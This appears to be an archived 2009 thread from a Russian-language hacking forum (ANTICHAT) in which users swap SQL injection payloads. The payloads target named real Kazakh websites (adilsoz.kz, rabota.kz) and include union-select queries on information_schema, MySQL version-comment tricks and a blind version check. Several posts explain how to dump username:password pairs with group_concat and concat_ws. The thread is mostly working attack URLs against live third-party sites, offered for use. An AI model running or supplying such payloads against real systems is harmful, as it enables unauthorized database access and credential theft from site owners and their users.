ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.01.2009, 00:19
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.tables+limit+45,1--
table_name - имя таблицы
table_schema - бд, в которой таблица
В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть:
from+froum.ibf_cal_events
Последний раз редактировалось R1dex; 23.01.2009 в 00:21..
|
|
|
23.01.2009, 00:42
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
23.01.2009, 00:46
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от AFoST
версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
Ясненько, спасибо. Значит дальше рыть бесполезно?
|
|
|
|
23.01.2009, 00:48
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Как работать с 3 веткой:
http://forum.antichat.ru/showpost.php?p=565034&postcount=4
|
|
|
|
23.01.2009, 00:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ну почему, блайнд sql фактически,
http://rabota.kz/candidates/vacancies.php?cat=-123+and+substring(@@version,1,1)=3
читай подпись, там есть
|
|
|
|
23.01.2009, 12:24
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682
Репутация:
30
|
|
Всем привет!
Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
|
|
|
|
23.01.2009, 12:33
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от Octave_Parango
Всем привет!
Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
попробуй
1) через limit 1,5 или 1,10
2) concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))
Последний раз редактировалось Gemini12; 23.01.2009 в 13:06..
|
|
|
|
23.01.2009, 12:50
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Gemini12
2) group_ws(0x0a,group_concat(group_ws(0x3a,name,pass )))
Будь добр, объясни эту конструкцию, документация по мускулу ответов не даёт.  Особенно интересна эта функция: group_ws
|
|
|
|
23.01.2009, 13:05
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038
Репутация:
9
|
|
Сообщение от jokester
Будь добр, объясни эту конструкцию, документация по мускулу ответов не даёт. Особенно интересна эта функция: group_ws я там ошибся, не group_ws а concat_ws 
ну а если и это интересно то:
Код:
concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pass)))
concat_ws - выводит значения столбцов из таблиц, разделяя при этом точками, запятыми, двоеточиями, я в основном использую двоеточия, отсюда и "0x3a";
Код:
concat_ws(0x3a,name,pass)
т.е. вывести name : pass
а group_concat - это чтобы лимитом мозги не е*ать, выводит все таблицы, но при этом по умолчанию стоит лимит 1024 символов, только админ может поменять значение? так что если не все таблицы показало, придется limit'ом добивать...
Последний раз редактировалось Gemini12; 23.01.2009 в 13:08..
|
|
|
|
23.01.2009, 13:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Gemini12
я там ошибся, не group_ws а concat_ws ну а если и это интересно то:
Я написал какая функция меня интересовала, но, даже так , мне очень интересно, зачем использовать concat_ws 2 раза?
concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))
Это какой-то новый подход? Что он даёт? Мне кажется, не нужно торопится, и давать ответы в которых сам не уверен
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
